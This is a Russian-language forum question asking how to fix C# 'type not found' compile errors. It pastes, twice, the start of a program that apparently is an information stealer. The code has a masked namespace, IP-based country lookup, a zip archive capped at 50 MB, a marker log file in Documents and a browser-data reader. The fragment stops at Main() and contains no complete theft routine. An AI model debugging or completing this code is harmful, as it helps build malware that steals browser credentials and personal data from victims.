Как профиксить ошибку при компиляции? Program.cs(16,23): error CS0246: Не удалось найти тип или имя пространства имен "InfoSorter" (возможно, отсутствует директива using или ссылка на сборку). Program.cs(21,24): error CS0246: Не удалось найти тип или имя пространства имен "DataManager" (возможно, отсутствует директива using или ссылка на сборку). using Microsoft.Win32; using System; using System.IO; using System.IO.Compression; using System.Net; using System.Threading; using System.Collections.Specialized; using System.Collections.Generic; using System.Linq; namespace ******* { class Program { private const int maxZipSize = (1024 * 1024) * 50; public static InfoSorter locationInfo = InfoGetter.GetCountryName(InfoGetter.GetIpAdress()); private static MemoryStream zipArchive; private static readonly string fileCheck = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + $@"\sdma.log"; private static readonly string _logo = @""; private static DataManager browsersReader; static void Main() { C# using Microsoft.Win32; using System; using System.IO; using System.IO.Compression; using System.Net; using System.Threading; using System.Collections.Specialized; using System.Collections.Generic; using System.Linq; namespace ******* { class Program { private const int maxZipSize = (1024 * 1024) * 50; public static InfoSorter locationInfo = InfoGetter.GetCountryName(InfoGetter.GetIpAdress()); private static MemoryStream zipArchive; private static readonly string fileCheck = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + $@"\sdma.log"; private static readonly string _logo = @""; private static DataManager browsersReader; static void Main() {